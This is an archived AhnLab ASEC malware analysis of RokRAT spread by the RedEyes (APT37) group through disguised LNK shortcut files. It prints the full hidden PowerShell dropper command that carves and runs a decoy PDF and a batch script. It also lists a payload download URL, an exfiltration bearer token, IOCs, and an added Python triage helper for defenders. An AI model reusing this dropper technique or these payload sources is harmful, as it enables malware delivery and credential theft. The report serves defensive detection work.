RokRAT Malware Distributed Through LNK Files (*.lnk): RedEyes (ScarCruft) - ASEC
By ATCP. Published: 2023-04-20 · Archived: 2026-04-05 15:14:16 UTC

AhnLab Security Emergency response Center (ASEC) confirmed that the RedEyes threat group (also known as APT37, ScarCruft), which distributed the CHM malware disguised as a security email from a Korean financial company last month, has also recently distributed the RokRAT malware through LNK files. RokRAT is malware capable of collecting user credentials and downloading additional malware; it was previously distributed through HWP and Word files. The LNK files discovered this time contain PowerShell commands that carry out the malicious behavior by creating a script file alongside a normal (decoy) file in the Temp folder and executing both.

The confirmed LNK filenames are as follows:

  230407Infosheet.lnk
  April 29th 2023 Seminar.lnk
  2023 Personal Evaluation.hwp.lnk
  NK Diplomat Dispatch Selection and Diplomatic Offices.lnk
  NK Diplomacy Policy Decision Process.lnk

The “230407Infosheet.lnk” file is disguised with a PDF icon and contains a malicious PowerShell command.

https://asec.ahnlab.com/en/51751/ Page 1 of 6

Figure 1. Properties of the LNK file

The LNK file contains not only a PowerShell command but also the data of a normal PDF file along with the malicious script code. Furthermore, dummy bytes run from offset 0x89D9A all the way to 0x141702A.

Figure 2. Dummy data that exists at the end of the LNK file

The PowerShell command that cmd.exe executes when the LNK file is opened is as follows (the ^| and ^& sequences are cmd.exe escapes for | and &):

  /c powershell -windowstyle hidden
  $dirPath = Get-Location;
  if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') { $dirPath = '%temp%' };
  $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x00014A0DC4} ^| Select-Object -ExpandProperty FullName;
  $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00561396 -ReadCount 00561396;
  $pdfPath = '%temp%\230407정보지.pdf';
  sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 002474)) -Encoding Byte;
  ^& $pdfPath;
  $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00564634 -ReadCount 00564634;
  $exePath = '%temp%\230412.bat';
  sc $exePath ([byte[]]($exeFile ^| select -Skip 00561396)) -Encoding Byte;
  ^& $exePath;

The command first locates the LNK file itself by searching the current directory (or the Temp folder, if it was launched from System32 or Program Files) for a .lnk file of exactly 0x14A0DC4 bytes. It then reads the first 0x890F4 bytes of the LNK file, skips the first 0x9AA bytes, and saves the remainder in the Temp folder as “230407Infosheet.pdf”, which it opens. Afterward, it reads the first 0x89D9A bytes, skips the first 0x890F4 bytes (the region holding the PDF data), and saves the remainder in the Temp folder as “230412.bat”, which it executes.

Figure 3. PDF data located at 0x9AA of the LNK file

Figure 4. Script code located at 0x890F4 of the LNK file

Figure 5. Files created in the Temp folder

The threat actor opens a normal PDF file so that the behavior appears legitimate before carrying out the malicious behavior through the script file.

Figure 6. 230407Infosheet.pdf (normal file)

The script file executed at the same time contains the following PowerShell command, which executes malicious commands stored as HEX values.

Figure 7. 230412.bat
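As an added example that is not part of the ASEC report, the following Python helper triages an LNK file for the traits described above: a valid ShellLink header, a size far beyond a normal shortcut, an embedded PDF, PowerShell fragments in the argument string or an appended script, and a run of dummy bytes at the end of the file. The sample blob, its offsets and the 64 KB size threshold are constructed assumptions, not values taken from the analysed file.

```python
import re

# ShellLink header: HeaderSize 0x4C followed by CLSID 00021401-0000-0000-C000-000000000046.
LNK_HEADER = b"\x4c\x00\x00\x00" + bytes.fromhex("0114020000000000c000000000000046")
PDF_MAGIC = b"%PDF-"
# Command-line fragments from the dropper described above; each is matched both as
# ASCII (appended script) and as UTF-16LE (the LNK's own argument string).
MARKERS = [b"powershell", b"-windowstyle hidden", b"-Encoding Byte", b"select -Skip"]


def find_markers(data: bytes) -> list:
    """Return the markers present in either encoding, case-insensitively."""
    found = set()
    for m in MARKERS:
        for encoded in (m, m.decode().encode("utf-16-le")):
            if re.search(re.escape(encoded), data, re.IGNORECASE):
                found.add(m.decode())
    return sorted(found)

def find_embedded_pdf(data: bytes):
    """Locate an embedded PDF: (start, end) spanning '%PDF-' to the last '%%EOF'."""
    start = data.find(PDF_MAGIC)
    if start < 0:
        return None
    eof = data.rfind(b"%%EOF")
    end = len(data) if eof < start else eof + len(b"%%EOF")
    return start, end

def trailing_padding(data: bytes) -> int:
    """Count the run of identical bytes at the end of the file (dummy data)."""
    return len(data) - len(data.rstrip(data[-1:])) if data else 0

def triage_lnk(data: bytes, max_normal_size: int = 64 * 1024) -> dict:
    """Summarise which dropper traits are present; an analyst then carves the regions."""
    return {
        "lnk_header": data.startswith(LNK_HEADER),
        "oversized": len(data) > max_normal_size,
        "embedded_pdf": find_embedded_pdf(data),
        "script_markers": find_markers(data),
        "trailing_padding": trailing_padding(data),
    }

def build_sample() -> bytes:
    """Constructed stand-in for the layout described above (header + UTF-16LE arguments,
    embedded PDF, appended script, dummy padding). Offsets are NOT the real sample's."""
    args = "/c powershell -windowstyle hidden gc $lnkpath -Encoding Byte".encode("utf-16-le")
    pdf = b"%PDF-1.4\n1 0 obj<<>>endobj\n%%EOF"
    script = b"@echo off\r\npowershell -windowstyle hidden -c \"# constructed marker\"\r\n"
    return LNK_HEADER + args + b"\x00" * 32 + pdf + script + b"\x00" * 70000
```

Run triage_lnk() on the bytes of a suspect shortcut; the embedded_pdf offsets can be used to carve the decoy document for comparison with the file the user was shown.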
The final PowerShell command that is executed downloads encoded data from hxxps://api.onedrive[.]com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL2kvcyFBaFhFWExKU05NUFRiZnpnVU14TmJJbkM2Q0k_ZT1WZElLSj, decodes it, and injects it into the PowerShell process to carry out the malicious behavior.

Figure 8. Final PowerShell command that is executed

Figure 9. Malicious file uploaded to OneDrive

The injected data is the RokRAT malware, which is capable of collecting user credentials and downloading additional malware. The collected information is sent to the threat actor’s cloud storage using cloud services such as pCloud and Yandex. The User-Agent in the request header is disguised as Googlebot. The bearer token used in the Authorization header when sending files is as follows:

  Authorization: Bearer RSbj7Zk5IYK5ThSbQZH4YBo7ZxiPOCH94RBbFuU9c04XXVJg7xbvX

The additional normal (decoy) files executed through the malicious LNK files are as follows:

Figure 10. April 29th 2023 Seminar.pdf created through April 29th 2023 Seminar.lnk

Figure 11. 230402.hwp created through NK Diplomacy Policy Decision Process.lnk

As RokRAT has been in distribution for a while and is being distributed in various forms such as Word files, users are advised to take extra caution.

Related analysis reports:
  Reddoor (RokRAT) Malware Analysis Report – May 9, 2022
  Korean APT Attacks Using Ruby Script Analysis Report – Apr. 7, 2021

[File Detection]
  Dropper/LNK.Agent (2023.04.08.00)
  Downloader/BAT.Agent (2023.04.08.00)

MD5
  0f5eeb23d701a2b342fc15aa90d97ae0
  461ce7d6c6062d1ae33895d1f44d98fb
  657fd7317ccde5a0e0c182a626951a9f
  8e5cac0159a31ea808973508ce164e1d
  aa8ba9a029fa98b868be66b7d46e927b
URL
  https[:]//1drv[.]ms/i/s!AhXEXLJSNMPTbfzgUMxNbInC6
  https[:]//api[.]onedrive[.]com/v1[.]0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL2kvcyFBaFhFWExKU05NUFRiZnpnVU14TmJJbkM2Q0k_ZT1WZE
  https[:]//api[.]onedrive[.]com/v1[.]0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBdTJteTF4aDZ0OFhnUjJNem1zOG5oUndvLTZCP2U9akhIQ

Additional IOCs are available on AhnLab TIP.

Source: https://asec.ahnlab.com/en/51751/